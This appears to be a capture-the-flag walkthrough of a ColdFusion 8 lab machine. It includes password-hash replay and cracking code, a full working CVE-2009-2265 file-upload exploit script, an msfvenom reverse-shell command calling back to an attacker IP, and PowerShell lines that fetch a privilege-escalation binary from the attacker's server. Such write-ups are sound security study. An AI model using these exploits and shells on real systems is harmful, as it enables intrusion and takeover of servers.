Basic information

Port scan

$ nmap -sC -sV -Pn 10.10.10.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 13:58 CST
Nmap scan report for 10.10.10.11
Host is up (0.068s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.15 seconds

8500

Browsing to the port directly lists two directories. /CFIDE/administrator is the login page, and the page itself identifies the product as ColdFusion 8:

ColdFusion

This version of ColdFusion can be attacked in two ways: an unauthenticated upload of a JSP file that is then requested to trigger the shell, or an arbitrary file read that yields the admin password hash, which is cracked (or replayed) to log in and upload a shell:

Arbitrary file read

Read out the password hash and crack it; the username is admin:

If the plaintext cannot be recovered, the hash itself can be used to produce the value the login form sends: the ColdFusion 8 login JavaScript sends an HMAC-SHA1 of the stored hash keyed with the per-request salt, so running the same helper in the browser console with the stored hash is enough:

hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03');
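The same computation done offline, as an added example that is not part of the original writeup or of ColdFusion itself. It reproduces the hex_hmac_sha1(key, data) helper from the login page in Python (same argument order: salt first, stored hash second), and adds the offline check used when cracking the stored hash, which in ColdFusion 8 is a plain unsalted SHA-1 of the password. The salt value and the wordlist are constructed sample inputs; the stored hash is the one quoted above.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Stored hash quoted in the writeup (ColdFusion 8 keeps it as uppercase SHA-1 hex).
STORED_HASH = "2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03"


def hex_hmac_sha1(key: str, data: str) -> str:
    """Python equivalent of the hex_hmac_sha1(key, data) JavaScript helper on the
    ColdFusion 8 login page: HMAC-SHA1 keyed with `key` over `data`, as lowercase hex."""
    return hmac.new(key.encode(), data.encode(), hashlib.sha1).hexdigest()


def cf8_login_value(salt: str, stored_hash: str) -> str:
    """Value the browser would submit in the password field when replaying the
    stored hash: the salt comes from document.loginform.salt.value on the login
    page, and the hash is passed through exactly as it appears in the properties
    file, which is what the browser-console call in the writeup does."""
    return hex_hmac_sha1(salt, stored_hash)


def password_matches(candidate: str, stored_hash: str) -> bool:
    """Offline check for a guessed plaintext: the stored hash is unsalted SHA-1,
    so no salt is needed here (the salt only enters the login-form HMAC)."""
    return hashlib.sha1(candidate.encode()).hexdigest().lower() == stored_hash.lower()


def crack(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack over the stored SHA-1; returns the first match or None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if password_matches(word, stored_hash):
            return word
    return None


if __name__ == "__main__":
    # Constructed sample salt; a real one is read from the login form on each request.
    sample_salt = "1234567890123"
    print("login value:", cf8_login_value(sample_salt, STORED_HASH))
    # Constructed wordlist; replace with a real list when cracking for real.
    print("cracked:", crack(STORED_HASH, ["password", "admin", "coldfusion"]))
```

If `crack` returns None the hash is simply replayed through `cf8_login_value`; either way the username remains admin.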

Once logged in, a JSP can be uploaded through Add New Scheduled Task, then found in the directory listed earlier and requested to trigger it (the page loaded far too slowly, so I used the other method instead):

Arbitrary file upload / RCE

The forum provides a script. Generate a JSP reverse shell with msfvenom, start a listener on the chosen port, and upload it:

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.6 lport=4445 -f raw > miao.jsp

$ python exp.py 10.10.10.11 8500 ./miao.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp

Then request the uploaded file to trigger it and get a shell:

exp.py

#!/usr/bin/env python3
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# The upload goes through the FCKeditor connector bundled with ColdFusion 8. The
# uploaded file name is exploit.txt (so the extension check passes), but the
# CurrentFolder parameter ends in exploit.jsp followed by a null byte (%00), which
# truncates the server-side path, so the file is stored as
# /userfiles/file/exploit.jsp and served as a JSP.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import sys

import requests

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        # Optional URL prefix when ColdFusion is not mounted at the web root.
        path = sys.argv[3]
        with open(sys.argv[4], 'rb') as payload:
            body = payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'rb') as payload:
            body = payload.read()
except IndexError:
    print('Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>')
    print('Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp')
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print('Sending payload...')

try:
    req = requests.post(
        basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
        "?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00",
        files={'newfile': ('exploit.txt', body, 'application/x-java-archive')},
        timeout=30,
    )
    if req.status_code == 200:
        print('Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploit.jsp')
    else:
        print('Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason)
except requests.Timeout:
    print('Failed to upload payload... Request timed out')

user flag

user.txt is on the desktop of the user the shell is running as:

Privilege escalation information

Feeding the systeminfo output to a privilege escalation suggester returns many candidates; here I chose MS10-059 (the Chimichurri exploit):

Privilege escalation

This is just a matter of transferring the exploit and running it. From the cmd.exe shell, write a small PowerShell download script line by line and run it with the execution policy bypassed; the exploit binary is served from an HTTP server on the attacker machine on port 7777 (loading meterpreter and running its privilege escalation module directly is much faster):

echo $webclient = New-Object System.Net.WebClient >>miao.ps1
echo $url = "http://10.10.14.6:7777/Chimichurri.exe" >>miao.ps1
echo $file = "exploit.exe" >>miao.ps1
echo $webclient.DownloadFile($url,$file) >>miao.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File miao.ps1

root flag

After running the exploit, root.txt is on the Administrator user's desktop:

References